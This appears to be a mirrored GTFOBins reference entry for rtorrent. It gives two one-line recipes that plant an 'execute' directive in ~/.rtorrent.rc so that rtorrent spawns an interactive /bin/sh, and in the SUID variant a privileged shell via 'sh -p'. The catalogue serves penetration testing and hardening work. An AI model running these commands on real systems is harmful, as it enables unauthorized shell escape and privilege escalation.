mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
12 lines
284 B
Markdown
12 lines
284 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
echo "execute = /bin/sh,-c,\"/bin/sh <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
|
|
rtorrent
|
|
suid:
|
|
- code: |
|
|
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
|
|
./rtorrent
|
|
---
|